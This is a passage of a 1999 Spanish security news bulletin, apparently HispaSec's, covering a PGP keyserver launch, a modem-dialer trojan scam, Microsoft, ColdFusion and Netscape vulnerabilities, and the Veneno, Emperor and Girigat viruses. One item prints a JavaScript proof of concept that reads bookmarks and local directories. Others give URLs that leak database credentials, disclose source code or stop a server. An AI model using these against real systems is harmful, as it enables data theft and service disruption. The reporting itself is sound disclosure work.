lunes, 31 de mayo de 1999

HispaSec inaugura su servidor de llaves PGP

Los usuarios de PGP ya pueden utilizar nuestro recién estrenado
servidor de llaves basado en LDAP (Lightweight Directory Access
Protocol). En breve tendrán más información sobre este nuevo
servicio, así como un gateway LDAP-HTTP para las versiones más
antiguas de PGP. De momento les invitamos a que prueben este
nuevo servicio, puesto en marcha hace apenas unas horas, para
lo que les presentamos unas nociones básicas.
En el caso de que un usuario de PGP desee enviar información
cifrada, necesita conocer la llave pública del destinatario para
poder realizar la operación. Los usuarios de PGP suelen enviar
una copia de su llave pública a un servidor donde pueda ser
consultada por cualquier otra persona. Esto permite que podamos,
a través de la consulta del servidor, conseguir una copia de la
llave más actualizada, al mismo tiempo que nos permite el poder
prescindir de tener que soportar, actualizar y sincronizar bases
de datos en nuestros sistemas con todas las llaves públicas que
necesitamos.

Las últimas versiones del PGP permiten interactuar directamente
desde el cliente con el servidor de llaves a través del protocolo
LDAP. De esta forma, toda la gestión de llaves se realiza de forma
mucho más rápida, segura y cómoda. El servidor de HispaSec, recién
inaugurado, se convierte de esta forma en uno de los pocos que
ofrecen este servicio en nuestro país y sin duda el más avanzado,
al incorporar la última tecnología al respecto. Ofrecemos esta
primicia a nuestros suscriptores, para que puedan disfrutar de
sus ventajas desde el primer momento, pero en breve ampliaremos
tanto la información como los servicios prestados.

Para hacer uso de este nuevo servicio, basta con seguir unos
sencillos pasos.

* Configurar el servidor de llaves públicas:

1. Abrir la aplicación PGP Preferences desde el menú de PGP.
2. Seleccionar la pestaña Servers.
3. Pulsar el botón New.
4. Protocol = LDAP
5. Server Name = hispasec.com
6. Pulsar el botón Ok.
7. A través del botón Set as Root podremos configurar este servidor
como predeterminado para nuestras operaciones por defecto.

* Enviar nuestra llave pública a el servidor

Estando conectados a Internet:
1. Abrir la aplicación PGPkeys desde el menú de PGP.
2. Seleccionar en la lista la llave pública que queremos enviar
al servidor.
3. En el menú Server podremos seleccionar entre la lista el servidor
al que queremos enviar la llave pública, hispasec.com en nuestro
caso.

* Buscar una llave pública a través de un servidor

Estando conectados a Internet:
1. Abrir la aplicación PGPkeys desde el menú de PGP.
2. Seleccionar la opción Search del menú Server. También puede
realizarse con la pulsación de las teclas Ctrl+F.
3. Seleccionar el servidor donde vamos a realizar la consulta en
la lista desplegable, hispasec.com en nuestro caso concreto.
4. Seleccionar los criterios a través del resto de listas e
introducir el dato concreto para iniciar la búsqueda.
5. En la parte inferior nos aparecerá los datos del usuario que
estamos buscando con sus correspondientes llaves.

Esperamos nos hagan llegar, a través de la cuenta hispasec@hispasec.com,
cualquier consulta o sugerencia que se pueda derivar del uso del
servidor PGP. En breve, tendrán completa información sobre este
servicio y las nuevas características añadidas.


Bernardo Quintero



domingo, 30 de mayo de 1999

Estafas telefónicas a través de la pornografía en Internet

En enero de 1997 se produjo un timo en Internet que llegó a provocar
facturas telefónicas de cientos de miles de pesetas a víctimas
ingenuas en Canadá que descargaron pornografía del sitio Web
sexygirls.com.
EL sitio Web informaba a los usuarios desprevenidos, ávidos de sexo,
que las fotos que ofrecían eran totalmente gratis. Ahora bien, para
ver las fotografías era necesario descargar un visor de imágenes
especial. Como los navegantes ya están acostumbrados a instalar
plug-ins y aplicaciones de ayuda, no le prestaban mayor importancia y
lo instalaban inocentemente en su ordenador. Lo que no podían imaginar
es que en realidad se trataba de un caballo de Troya.

Al ejecutar este visor especial, silenciaba el altavoz del módem del usuario, a continuación lo desconectaba del proveedor de acceso a
Internet que estuviera utilizando y se conectaba sigilosamente a un
número de teléfono en Moldavia, en la antigua Unión Soviética. De
Moldavia, la llamada se redirigía a un ordenador en Scarborough, en Norteamérica, donde se encontraban almacenadas las fotos pornográficas
que se presentaban al usuario. De manera subrepticia, el ordenador del
navegante en Canadá estaba accediendo a un servidor en Scarborough a
través de una llamada de larga distancia a Moldavia. Lo que es más,
aunque el usuario se cansase de ver pornografía y saltase a otros
sitios Web abandonando sexygirls.com, continuaba haciéndolo conectado
con Moldavia que funcionaba ahora como proveedor de servicio, con los
pasos corriendo a ritmo frenético.

Este suceso ilustra los peligros de instalar plug-ins y software
indiscriminadamente, sin prestar atención a lo que se hace. En este
caso, la negligencia llegó a costar facturas telefónicas incluso
cercanas al millón de pesetas a los navegantes incautos.


Gonzalo Álvarez Marañón
criptonomicon@iec.csic.es
Boletín Criptonomicón #50
http://www.iec.csic.es/criptonomicon



sábado, 29 de mayo de 1999

Microsoft soluciona el problema del icono de favoritos en IE 5

Microsoft publica un parche que soluciona los problemas asociados
al icono de personalización de favoritos, la nueva característica de
Explorer 5 que tanto ha dado que hablar en los últimos días.
Como ya hemos comentado en otras ocasiones, entre las nuevas
características incorporadas en Microsoft Internet Explorer 5.0
se brinda la oportunidad al desarrollador de una página web de
personalizar mediante un icono el enlace que aparece en las páginas
de favoritos. Basta con incluir un icono con el nombre favicon.ico
en el directorio del web para que cuando el usuario decida añadir
la página a los favoritos, el icono se suba de forma automática e
identifique el link con dicha imagen. Pero esto ha traído diversos
problemas.

Ahora Microsoft publica un parche que elimina todos los problemas
que podían darse a través de dicho icono. Ya que Explorer no
controlaba el formato y tamaño del archivo transmitido, por lo
que un archivo de icono especialmente creado, podía provocar un
desbordamiento de buffer y dar la posibilidad de ejecución de
código en el ordenador del usuario. Este problema sólo afecta
a los usuarios de Explorer 5 bajo Windows 95/98.

El parche también trata el problema asociado al control "Legacy
ActiveX", este control era usado por versiones anteriores de
Explorer y se incluye dentro de Explorer 4 y 5, aunque no es
usado en las últimas versiones del navegador. Pero se podía
realizar un uso abusivo de este control, permitiendo a un sitio
web la lectura del disco duro local del usuario. Microsoft
recomienda a los usuarios que puedan verse afectados por
alguno de los problemas la actualización de Explorer con el
nuevo parche.

Más información:
Microsoft Knowledge Base (Icono favoritos)
Microsoft Knowledge Base (Control ActiveX)
Parche
Boletín de Microsoft
HispaSec "Un icono puede colgar Explorer 5.0"
HispaSec "Nuevo agujero contra la privacidad en Internet Explorer 5.0"


Antonio Ropero



viernes, 28 de mayo de 1999

Microsoft saca nuevos parches para paliar los problemas de RAS Y RRAS.

Microsoft ha puesto a disposición de los usuarios sus últimos parches
para paliar algunos problemas de seguridad dentro del RAS (Remote
Access Service), la parte encargada de las comunicaciones de
Windows NT.
Microsoft cubre así la vulnerabilidad existente en Remote Access
Service (RAS) y en Routing y Remote Access Service (RRAS), por la
cual cuando aparecía la opción de grabar la clave en el dialogo del
menú el programa siempre la almacenaba fuera cual fuese la opción
utilizada por el usuario.

Las credenciales de seguridad en las que se incluye la clave se
guardan en un registro protegido por ACLs cuyos valores predefinidos
dan autorización únicamente a los administradores y al usuario afectado
para acceder a ellos. El Service Pack 4 también proporciona la opción
de realizar una encriptación fuerte de las contraseñas en el registro
SISKEY.

El parche deberá ser aplicado a todos los ordenadores que usen RAS o
RRAS, así mismo, también deberán ser tratadas todas las máquinas que
utilicen RRAS como clientes.

Las versiones afectadas son:
Microsoft Windows NT Workstation 4.0
Microsoft Windows NT Server 4.0
Microsoft Windows NT Server 4.0, Enterprise Edition

Los parches puede encontrarse en:
RAS
RRAS

Más Información:

Microsoft
Soporte Microsoft
Soporte Microsoft
Boletín Microsoft



Antonio Román



jueves, 27 de mayo de 1999

Problemas en Microsoft Site Server

La solución web de Microsoft para empresas y comercio electrónico
Microsoft Site Server, también se ve expuesta ante las instalaciones
típicas.
Microsoft Site Server permite la instalación del directorio AdSamples,
en el que se muestran las ventajas (o inconvenientes) del uso de este
componente. Si este directorio queda instalado y abierto al público
sin limitación de permisos, cualquier usuario puede obtener un
archivo con la configuración del sitio web y gran cantidad de
información sensible.

El archivo problemático contiene información sobre el DSN de la
base de datos SQL, junto con el nombre y la password empleada por
Ad Server para acceder a ella. De esta forma cualquier usuario
puede obtener acceso total a la base de datos SQL, consultar sus
contenidos, e incluso modificarlos. Una URL tan sencilla como
http://www.sitio-vulnerable.com/adsamples/config/site.csc daría
acceso a un atacante a dicho archivo y la información crítica.

Según hemos podido comprobar en un chequeo rutinario son múltiples
los sitios web que dejan accesible dicho directorio y por tanto
quedan vulnerables a este ataque. El problema es fácil de solucionar
eliminando el directorio AdSamples del raíz del servidor web, o
modificar los permisos de seguridad de este directorio para que
sólo se pueda acceder a ella desde la propia máquina. Aunque como
siempre, lo mejor es ajustarnos a la regla de seguridad por
excelencia a la hora de instalar un servidor, es decir, no
instalar ningún tipo de archivos de ejemplo.

Más información:
NTSecurity


Antonio Ropero



miércoles, 26 de mayo de 1999

Nuevos problemas en ColdFusion

Recientemente nos hicimos eco de una vulnerabilidad descubierta en
ColdFusion, el popular software de servidor de aplicaciones web.
En la última semana, Allaire, ha publicado tres nuevos avisos de
seguridad concernientes a este producto. Aunque su incidencia puede
resultar menor que la vulnerabilidad descubierta recientemente,
pueden llegar a causar determinados problemas.
El primero de los problemas hace alusión a la posibilidad de
visualizar el código fuente de las páginas en los servidores
web de Netscape para Windows NT. Aunque no se trata de un problema
particular de ColdFusión, ya que Netscape Enterprise Server 3.x
deja al descubierto la posibilidad de leer el código de cualquier
fichero de script como cfml o perl. El problema, similar al
recordado ::$DATA de Internet Information Server puede ser
reproducido en servidores Netscape añadiendo %20 al final de
la línea URL (por ejemplo: http://www.sitio-afectado.com/index.cfm%20).
Netscape ofrece un parche para solucionar esta vulnerabilidad.

Un problema totalmente distinto puede llegar a posibilitar un ataque
de denegación de servicio al usar una herramienta de administración
vía web de ColdFusion. El ColdFusion Administrator incluye una
utilidad para iniciar y parar el servicio ColdFusion desde un
navegador. Cuando se encuentra habilitado el nivel de seguridad
básico (Basic Security) esta utilidad se encuentra protegida por
la password del administrador. Sin embargo, cuando se activa la
seguridad avanzada (Advanced Security), al contrario de toda lógica,
la utilidad de iniciar/parar no está protegida con contraseña,
permitiendo que cualquier usuario no autorizado detenga el
servidor de ColdFusion. Se puede acceder a este administrador
a través de la URL http://sitio-afectado/CFIDE/Administrator/startstop.html
basta eliminar esta página para evitar cualquier problema. En caso
de que sea preciso hacer uso de esta utilidad, se puede proteger el
archivo con la propia seguridad del servidor web.

Por último, Allaire añadió la posibilidad de cifrar páginas para
hacer más difícil la posibilidad de visualizar el código en aquellas
aplicaciones o componentes que se distribuyen a terceros como fuente.
Para ello, ColdFusion dispone de la posibilidad de cifrar los
documentos cfml de una aplicación o componente a través de
cfcrypt.exe. De esta forma, es posible distribuirlos o venderlos
sin necesidad de exponer el código fuente. Pero Allaire avisa de
la existencia de utilidades ilegales capaces de descifrar las
páginas encriptadas. Esto no quiere decir que los usuarios finales
puedan acceder al código fuente original, ya que el cfml es
procesado en el servidor ofreciendo código html estándar al
navegador del usuario. El descifrado del código afecta a
desarrolladores que distribuyen sus aplicaciones a otros
usuarios como fuente y desean proteger su creación.

Más información:
Allaire: Problema en servidores Netscape
Allaire: Denegación de servicio a través de CF. Admin
Allaire: Páginas cifradas
Netscape



Antonio Ropero



martes, 25 de mayo de 1999

Correo electrónico cifrado vía Web

Acaba de nacer un nuevo servicio que ofrece privacidad, mediante
un sistema de cifrado de llave pública, a través de un cliente de
correo vía Web. Mediante el uso de un applet de java HushMail
permite acceder a un cifrado fuerte de 1024 bits, de forma
totalmente gratuita, con la única ayuda de nuestro navegador.
Hush Communications, la empresa que ha lanzado esta nueva
iniciativa, parte con la promesa de proporcionar una total
privacidad a sus usuarios. Se presentan como la alternativa
a otros sistemas que presentan una mayor complicación a la
hora del intercambio de llaves, el coste del software y las
limitaciones que supone las leyes de exportación de los EE.UU.

Para evitar los problemas de exportación de los Estados Unidos,
en materia de sistemas de cifrado, Hush Communications ha
recurrido a ofrecer este servicio desde Anguilla, que se rige
por las leyes del Reino Unido. Por descontado, desde distintos
estamentos en EE.UU. ya se han apresurado en presentar este
servicio como un problema. Para llegar a esta conclusión se
escudan en que puede ser utilizado por entes que funcionaran
fuera del ámbito de la ley.

Los proveedores de email gratuitos suelen ser, frecuentemente,
blanco de los requerimientos judiciales para que ofrezcan
información de los usuarios que hacen uso de los sistemas, así
como de los contenidos de sus correos. En el caso de HusMail,
aunque contarán con registros de los mensajes, anuncian que no
podrán ofrecer ninguna información de los contenidos, ya que en
todo momento éstos estarán cifrados desde el origen.

Más información:
HushMail
Hush Communications
CNET


Bernardo Quintero



lunes, 24 de mayo de 1999

Cuidado con los plug-in

Los plug-ins son bastante útiles para simplificar la navegación pero
brindan un acceso total a los recursos del sistema, por lo que
conviene instalarlos con precaución.
En Netscape Communicator, en el menú de Edición, Preferencias...,
Navigator, Aplicaciones, se puede especificar qué aplicaciones de
ayuda y plug-ins se lanzarán en respuesta a la carga de ficheros con
una extensión determinada y un tipo MIME asociado que el navegador no
puede visualizar directamente. Así, por ejemplo, si al navegar por una
página web encuentra un enlace a un documento Word, cuya extensión es
.doc, al seguir el enlace se arrancará Microsoft Word, si así aparece
configurado en la ventana de aplicaciones. Esta característica permite
que el navegador sea capaz de visualizar directamente documentos en
PDF, archivos de sonido o de vídeo, etc.

Tanto las aplicaciones de ayuda como los plug-ins son programas en
código nativo con acceso total a los recursos del sistema, por lo
que conviene instalarlos con precaución, ya que si alguno estuviera
escrito con malas intenciones podría causar daños irreparables. De
hecho, se han producido ataques gracias a plug-ins maliciosos. Otros
plug-ins, sin estar específicamente diseñados para perjudicar al
navegante, contenían agujeros de seguridad que permitían obtener
información de su sistema, como ocurrió en 1997 con el plug-in de
ShockWave de Macromedia, que permitía a un servidor web obtener
ficheros del disco duro del visitante (véase
www.wired.com/news/technology/story/2548.html).

Por otro lado, una página maliciosa podría también utilizar documentos
que contuvieran virus de macro, como ha ocurrido en Word y Excel, para
hacer que el usuario incauto los ejecutara en su ordenador. Como medida
cautelar, se debe instalar el menor número posible de plug-ins y
aplicaciones de ayuda y siempre de casas conocidas en las que se puede
confiar. Para los tipos de archivo que se consideren potencialmente
portadores de virus o con capacidad de interpretar comandos, se debe
especificar que el navegador pida confirmación antes de abrirlos. Para
ello, se selecciona el tipo de documento, por ejemplo "Microsoft Excel
Worksheet" y se aprieta el botón de Editar... en la ventana que
aparece. En la nueva ventana se selecciona la opción de avisar antes
de abrir documentos de este tipo. Puede comprobar qué plug-ins tiene
instalados escribiendo about:plugins en la ventana de dirección.

Más información:
Consejos y trucos en Criptonomicon


Gonzalo Álvarez Marañón
criptonomicon@iec.csic.es
Boletín Criptonomicón #50
http://www.iec.csic.es/criptonomicon



domingo, 23 de mayo de 1999

"Veneno", un nuevo virus de macro para la versión española de Word

La saga continua, tras la aparición de Melissa y Papa, aparece Veneno
un nuevo virus informático creado para la versión castellana de Word.
Veneno es un nuevo virus diseñado para la versión castellana de Word,
al contrario que otros virus de macro que dan problemas sobre la
versión española este ha sido especialmente creado para atacar bajo
esta versión. En la actualidad se presenta bajo tres mutaciones
denominadas WM/Veneno A, WM/Veneno B y WM/Veneno C. Aunque la ultima,
es una variante corrupta sin ningún efecto salvo un mensaje cuando
se selecciona Archivo/Guardar como.

Nos pararemos en intentar comprender la activación e infección de la
primera versión de este virus. "WM/Veneno A" es un virus de macro
cifrado que infecta el área global de macros normal.dot y a la vez
elimina macros de otros virus. Infecta sólo la versión en castellano
del procesador de textos Word, y se activa cuando los minutos del
reloj de nuestro ordenador son iguales a 30. En ese momento crea
dos archivos temporales en C:/DOS, que utiliza para cargar un virus
binario, el Glupak.847.D en c:/dos/attrib.com.

Glupak.847.D, como su mismo nombre indica tiene un tamaño de 847
bytes, no es residente e infecta los archivos .com. Este virus de
origen canadiense se activa el 21 de octubre e intenta borrar la
unidad de disco duro. Posteriormente despliega el texto:
"Happy Birthday Freaky!". Este virus también puede borrar los
archivos *.zip y anti-vir.dat.

Una segunda forma de activación se produce cuando él número de
minutos es menor de 5 y el día es sábado o domingo. En este caso
se introduce dentro del documento activo el texto "**V>N>NO**". En
el caso de aparecer las letras "ste" las cambia por "stes",
posteriormente graba el documento con el password "Veneno" y lo
cierra.

El virus dispone de un tercer payload que se activa al reiniciar
el ordenador o al abrir un documento. En este caso el virus
reemplaza el c:\config.sys y el c:\autoexec.bat con lo que al
arrancar el ordenador aparece el mensaje:

Inserte un disco en la unidad A:
Presione cualquier tecla para continuar.

Después de este mensaje el virus intenta formatear la unidad A: si
esto no fuera posible trata de hacerlo con las unidades C: y D:.

Otra forma de hacerse notar el virus veneno en su versión A es la
reivindicativa, que surge cuando él número de segundos es superior
a 57 en el reloj del ordenador y se selecciona en el menú de la
barra de Word, Archivo/Imprimir o Archivo/vista preliminar, en
este momento agrega el siguiente texto al final del documento
activo:

Finalmente me gustaría agregar que...
El Centro de Computo de esta Universidad es una verdadera
vergüenza, no nos merecemos este servicio.
>>> Shame on you!!! <<<


Si se selecciona la opción Archivo/Guardar del menú de Word cuando
los segundos son exactamente 36, el virus muestra una ventana con
el siguiente texto:

Un amigo desesperado en busca de...
Khelia Monica Saldaña Díaz, me encantas y te sigo buscando...
¿Donde te has escondido? Atte. Tu enamorado. (LoVe90/91)

Más información:
Noticias Yahoo
DataFellows
Economic Data
AVP Virus Ecyclopedia


Antonio Román



sábado, 22 de mayo de 1999

Problema de seguridad en NT a través del servicio RAS

El servicio RAS (Remote Access Service) de Windows NT es vulnerable
a diversas sobrecargas de buffer que pueden provocar la ejecución
de código preparado que puede servir a un atacante para conseguir
acceso privilegiado a la máquina.
Hace unos días informábamos de la existencia de una vulnerabilidad
por sobrecarga de buffer en los ficheros de ayuda en Windows NT,
ahora se comprueba que el servicio RAS también está afectado por
problemas similares. Este servicio se emplea por los usuarios
remotos para llamar al servidor RAS y tener acceso a los recursos
locales a través de dicho servidor o a la red que se asocia. RAS
es además el servicio empleado por los usuarios para conectar con
otros servicios fuera de la máquina NT, por ejemplo, con el ISP
para acceder a Internet.

Con RAS se instalan diferentes programas y servicios, como
rassrv.exe, que implementa el servicio de servidor de acceso
remoto y se emplea para aceptar las llamadas entrantes. Rasman.exe
implementa el administrador de llamada automática para RAS (RAS
Autodial Manager) y el administrador de conexión RAS (RAS
Connection Manager) que se emplean en las llamadas al exterior.
Rasphone.exe es la aplicación que se usa cuando un usuario realiza
una llamada manual, así como para editar la agenda de teléfonos de
RAS. Por último también se usa rasdial.exe para efectuar llamadas
al exterior.

Rassrv.exe y rasman.exe son procesos del sistema y se ejecutan en
el contexto de seguridad del sistema mientras que rasphone.exe y
rasdial.exe trabajan normalmente en el entorno de seguridad del
usuario que inició el proceso. Todos los programas indicados,
excepto rassrv.exe parecen estar afectados por el problema.

La sobrecarga de buffer ocurre por que las funciones API de RAS,
como RasGetDialParams( ), no efectúan ninguna comprobación y
permite que se llenen las estructuras que contienen determinados
arrays. Por ejemplo, cuando el administrador de llamada automática
efectúa una llamada usa la función RasDailGetParams() para leer el
número de teléfono de la agenda rasphone.pbk. Tras ello, lo sitúa
en la estructura rasdialparams, que contiene matrices de caracteres.

Como no se realiza ninguna comprobación del tamaño de los datos si
el archivo rasphone.pbk contiene un número telefónico muy largo
causará una violación de acceso en rasman.exe. Si el número
introducido tiene un tamaño superior a 299 caracteres se
sobreescribe completamente el registro EIP del procesador, lo
que puede hacer que se modifique el orden de funcionamiento del
programa y se ejecute código arbitrario.

Por defecto, todos los usuarios tienen permisos para modificar
el archivo rasphone.pbk, con lo que cualquiera con acceso a él
puede editar su contenido y causar la sobrecarga de buffer. Los
permisos para este fichero deben de ser ajustados, pero a pesar
de ello cualquier usuario puede crear su propia agenda para RAS,
por lo que aun sin tener en cuenta los permisos de rasphone.pbk
en el directorio %systemroot%\system32\ras el ataque aun puede
ser posible.

Microsoft ha publicado un parche para solucionar este problema,
a través del cual cualquiera con acceso local a un sistema NT
puede conseguir elevar sus privilegios a los de administrador
por una sobrecarga de rasman.exe. Los programas rasphone.exe y
rasdial.exe también pueden ser usados de forma similar para
conseguir acceso total a un sistema.

Más información:
Sobrecarga de buffer con RAS, por David Litchfield
Sobrecarga de buffer en Windows NT, boletín de David Litchfield
Boletín de seguridad de Microsoft
Microsoft Knowledge Base
Parche para evitar el problema



Antonio Ropero



viernes, 21 de mayo de 1999

Emperor, la herencia del CIH

No podía hacerse esperar, el virus CIH se ha hecho famoso por sus
terribles consecuencias, ahora nuevos virus esperar seguir sus pasos.
Emperor es el primer virus que adopta las técnicas del CIH para llevar
a cabo su acción maligna.
Emperor es el primer virus que hereda características del CIH, sin
duda el virus más terrible y dañino de la historia de la informática.
Miles de ordenadores han dejado de funcionar por culpa del CIH, ahora
Emperor viene a sumarse a esta terrible cadena. El nuevo virus augura
aun una mayor acción dañina e intenta infectar a más ordenadores.
Gracias a una tecnología adicional se reproduce en más áreas del
disco duro aumentando las posibilidades de llegar a otro ordenador.

Emperor es un virus extremadamente peligroso, residente en memoria,
polimórfico y multipartite. Con un tamaño de aproximadamente 6 Kbytes
infecta ficheros DOS ejecutables COM y EXE, escribiendo su código al
final del archivo infectado y sobreescribiendo la MBR del disco duro
y el sector de arranque de los disquetes con su propia rutina de
carga que instala el virus en la memoria del sistema al arrancar.

Este nuevo virus dispone de numerosas técnicas anti debugging, usa
funciones stealth e incluye una rutina para coger la dirección del
núcleo del DOS para saltarse la protección antivirus. El virus tiene
algún bug, de forma que no siempre realiza la infección correctamente
y daña el fichero atacado, lo que hace que cuando se intente ejecutar
el sistema se cuelgue.

Al infectar la MBR el virus emplea múltiples técnicas para saltarse
la protección antivirus, a través de escritura de datos por llamadas
directas a los puertos controladores del disco duro o incluso
deshabilitando la protección antivirus de la BIOS borrando el campo
necesario en la CMOS.

El virus mantiene una copia de la MBR original y de los sectores de
arranque en el disco duro, pero cifra los datos de tal forma que sólo
funcionará correctamente en el caso de que el residente del virus se
encuentre activo. El virus también modifica la tabla de partición del
disco, esto tiene como resultado que resulta imposible cargar el
sistema desde un disco de MS-DOS limpio, siendo necesario el uso de
otra versión del DOS o herramientas especiales para acceder al disco
duro.

Pero es su payload el que sin duda le confiere la entidad de virus
peligroso. Si Emperor encuentra un debugger activo en la memoria
del sistema, o se realiza un reboot del ordenador entre las 5 am y
las 10 am, borrará los datos del disco duro y dañará las Fashh BIOS
en la misma forma que el CIH, dejando el ordenador sin posibilidad de
volver a encenderlo. Mientras esto ocurre el virus muestra el
siguiente mensaje:


EMPEROR
I will grind my hatred upon the loved ones.
Despair will be brought upon the hoping childs of happiness.
Wherever there is joy the hordes of the eclipse will pollute
sadness and hate under the reign of fear.
In the name of the almighty Emperor....



Desde luego se trata de un virus nuevo, con un payload muy dañino y
que puede darse cualquier día del año. basta con resetear el ordenador
entre las 5 y las 10 de la mañana, al contrario que el CIH que sólo afecta
una vez al año. A pesar de ello, NAi afirma que el alcance de Emperor
es mucho menor que el de Chernobyl, situándolo como un virus de bajo
riesgo. Los argumentos de NAi se centran en que Emperor sólo afecta a
programas DOS, mucho menos extendidos en la actualidad que los
ejecutables Windows atacados por el CIH.

Más información:
Nota de prensa de AVP
Descripción Emperor en AVP Virus Encyclopedia
Computerworld



Antonio Ropero



jueves, 20 de mayo de 1999

Vulnerabilidad en el bookmark de Netscape

Guninski, una vez más, vuelve a nuestras noticias con una variante
de las vulnerabilidades que ofrecíamos hace apenas unos días. En
esta ocasión, la introducción de código JavaScript, dentro del
espacio de título en la cabecera del documento HTML, puede
acarrear graves problemas de seguridad al almacenarse en el
bookmark.
El problema se presenta cuando introducimos código JavaScript
mediante las etiquetas <SCRIPT>[código]</SCRIPT> dentro del
apartado de título <TITLE></TITLE> en el documento HTML. El
código JavaScript será almacenado junto con el título cuando
introduzcamos la página en nuestro bookmark.

Cuando accedamos al bookmark y seleccionemos una de éstas páginas,
el código JavaScript se ejecutará, con la particularidad de que al
encontrarse en un fichero local, el bookmark, se le aplicarán las
bajas restricciones de seguridad que merecen este tipo de
documentos, con lo que podrá acceder a datos locales. Esto supone
que puede leer el bookmark, listar directorios y leer ficheros
locales.

Guninski nos presenta una demostración de esta vulnerabilidad
donde nos muestra direcciones de nuestro bookmark y ficheros de
nuestro disco duro:

<HTML><HEAD>
<TITLE>
<SCRIPT>
alert('Bookmarks got control');
s='Here are some bookmarks: \n';
for(i=1;i<7;i++)
s += document.links[i]+'\n';
alert(s);
dirToRead='wysiwyg://2/file://c:/';
a=window.open(dirToRead);
s='Here are some files in C:\\ :\n';
for(i=1;i<7;i++)
s += a.document.links[i]+'\n';
a.close();
alert(s);
</SCRIPT>
</TITLE>
...

Se ha confirmado el fallo en Netscape Communicator 4.51 para
Windows 95, y en la versión 4.07 para Linux, aunque todo parece
indicar que todas las versiones 4.x se encuentran afectadas.

Más información:
Demostración de la vulnerabilidad
Aviso de la vulnerabilidad
Agujeros de Guninski



Bernardo Quintero



miércoles, 19 de mayo de 1999

Vulnerabilidad por los ficheros de ayuda

Microsoft informa de una vulnerabilidad en Windows NT a través de
los ficheros del sistema de ayuda. El problema posibilita la ejecución
de código arbitrario en una máquina NT.
La multinacional de Bill Gates ha publicado a su vez un parche que
elimina los problemas asociados a esta vulnerabilidad, y recomienda
su instalación a los usuarios que puedan verse afectados. La utilidad
de ayuda de Windows, winhlp32.exe, analiza y muestra la información
de ayuda para las aplicaciones. La información de soporte está
incluida en el interior de archivos de muy diversos tipos, que se
generan por el Help Compiler (Compilador de Ayuda), que forma parte
de la utilidad AppWizard, guardándose por defecto en el directorio
WinNT\help. Por defecto los usuarios tienen permisos de escritura
sobre esta carpeta.

En la utilidad de ayuda existe un buffer sobre el que no se realiza
ningún tipo de chequeo. De forma, que un fichero de ayuda que haya
sido cuidadosamente modificado, puede ser empleado para ejecutar
código arbitrario en la máquina local a través de la clásica técnica
de desbordamiento de buffer. Como el Compilador de ficheros de ayuda
no genera el código necesario para explotar el problema, la
vulnerabilidad no se puede dar de forma accidental, sino que tiene
que modificarse el fichero de ayuda específicamente para ello.

Las máquinas afectadas por esta vulnerabilidad son estaciones de
trabajo, terminales y cualquier otra máquina que permita a los
usuarios acceder de forma interactiva y añadir o modificar ficheros
de ayuda. Los servidores generalmente no permiten el acceso a los
usuarios normales, por lo que Microsoft recalca que la vulnerabilidad
sólo afecta a la máquina local, sin posibilidad de explotar el
problema de forma remota. Aunque todo parece indicar que las
afirmaciones de Microsoft tienen poco fundamento, ya que el
fichero de ayuda hlp, puede verse acompañado de un fichero de
índice .cnt. Este archivo también puede modificarse de forma
similar a la explicada con el hlp, causado efectos similares..

Microsoft facilita un parche que previene de la ejecución de
código arbitrario en la máquina, pero no proporciona protección
ante un fallo de la utilidad de ayuda ante un archivo mal
construido. Sin embargo, un fallo de la utilidad de ayuda no
amenaza la estabilidad del sistema, permitiendo reiniciar el
programa de ayuda sin problemas.

Más información:
Boletín de Seguridad Microsoft
Microsoft Knowledge Base


Antonio Ropero



martes, 18 de mayo de 1999

Error en el diseño de la barra de direcciones de los navegadores

Juan Carlos García Cuartango alerta de una nueva vulnerabilidad,
está vez implícita en un error de diseño en la mayoría de los
navegadores, el eeror pueda facilitar la falsificación de una
página web.
Cuartango, el implacable cazador de bugs vuelve a sorprendernos
con un nuevo problema, según nos informa «si la URL no cabe en la
caja de direcciones el navegador muestra la parte derecha de la
misma lo que provoca un agujero de seguridad del timo frame-spoofing
o web-spoofing (falsificación de tramas o de servidores). El usuario
cree estar en un sitio diferente al que le aparece en su barra de
direcciones».

El problema reside en que la barra de navegación tan sólo muestra
la parte derecha de la URL. Por ejemplo, si durante la navegación
llegamos a una URL de la forma:
http://www.sitio_malicioso.com/pagina_maliciosa.html?http://www.yahoo.com?argumentos
En la barra de navegación tan solo se visualizará
http://www.yahoo.com?argumentos lo cual hará creer que nos encontramos
en un sitio legal. Todo ello debe acompañarse de una página web
modificada a tal efecto.

El problema se puede reproducir tanto en Netscape 4.5 como en
Internet Explorer 4 y 5. Al disponer la URL esta debe ser
cuidadosamente diseñada para que se visualice en la parte derecha
del navegador la parte correspondiente a la dirección que se
pretende falsear. Esto puede presentar un problema ya que para
cada tamaño de pantalla o dimensión del navegador el tamaño de
la barra puede variar, pero se puede solventar obligando a la
pantalla a visualizarse en un tamaño fijo. Cuartango ha avisado
de este problema, a su parecer bastante grave, a Netscape y
Microsoft, pero ambos han ignorado su aviso alegando que se trata
de un bug menor.

Más información:

Demo en español
Demo en inglés


Antonio Ropero



lunes, 17 de mayo de 1999

Girigat, el ataque del monstruo de 63 cabezas

Win32.Girigat.4937 es el nombre con el que se conoce a la nueva
amenaza vírica para las plataformas Windows de 32 bits
(Win9x/WinNT/WinCE). El virus, distribuido recientemente por su
propio autor, Mister Sandman, a diversas compañías antivirus, ha
sido descubierto "in the wild" y reportado en, por orden de
incidencias de menor a mayor, Indonesia, Japón, Dinamarca, Suiza,
Estados Unidos, Italia y, por último, Grecia, donde diversos rumores
apuntan a la posibilidad de que hubiese alcanzado los sistemas
informáticos de ciertos cuerpos administrativos del gobierno heleno.
La vía de expansión de este virus ha sido con casi total probabilidad
un gusano de mIRC encontrado recientemente en la conocida red Undernet,
que se ha encargado de difundir cientos de copias del virus por los
países anteriormente citados, según tenemos conocimiento hasta el
momento. No se han encontrado por ahora ejemplares víricos ocultos
en ninguno de los "newsgroups" de distribución habitual, lo que nos
hace pensar en principio en una tercera vía de difusión aún desconocida.
No obstante, el hecho de que el gusano que distribuye el virus por
Internet no sea de la misma autoría que el virus, así como que hubiese
sido el propio autor de Girigat quien hubiese enviado con cierta
rapidez el virus a varias casas como AVP, DataFellows, NAi o Panda
hace pensar en la posible existencia de una tercera persona, encargada
de la distribución de Girigat, aparentemente sin la autorización de
su autor.

La principal característica de Girigat es su capacidad de automutar
su comportamiento, es decir, su forma de funcionar, cada vez que
cambia de ordenador. El virus puede ser residente por proceso (por
medio de API "hooking") o "runtime", o incluso ambos; asimismo, en
caso de funcionar por medio de acción directa, es capaz de trabajar
o bien en el directorio actual, o bien en el de Windows, o bien en
ambos. Por último, Girigat es capaz de infectar CPL (paneles de
control), EXE (ejecutables PE) y SCR (salvapantallas). El resultado
